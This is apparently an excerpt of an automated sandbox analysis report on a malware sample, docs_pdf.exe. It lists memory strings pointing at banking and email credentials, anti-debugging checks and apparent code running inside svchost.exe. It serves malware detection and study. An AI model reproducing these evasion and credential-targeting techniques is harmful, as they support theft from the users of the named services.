            Source: x1j09f428.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: x1j09f428.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: x1j09f428.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: HDtHilbfKZE.exe, 00000007.00000002.4550659884.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
            Source: x1j09f428.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: x1j09f428.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: x1j09f428.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: x1j09f428.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: x1j09f428.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: x1j09f428.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 0000000A.00000002.2775753156.0000020038C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
            Source: C:\Users\user\Desktop\docs_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-98007
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417F93 LdrLoadDll,2_2_00417F93
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001641FD BlockInput,0_2_001641FD
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000F3B4C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00125CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00125CCC
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016C304 LoadLibraryA,GetProcAddress,0_2_0016C304
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_036E3470 mov eax, dword ptr fs:[00000030h]0_2_036E3470
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_036E34D0 mov eax, dword ptr fs:[00000030h]0_2_036E34D0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_036E1E70 mov eax, dword ptr fs:[00000030h]0_2_036E1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
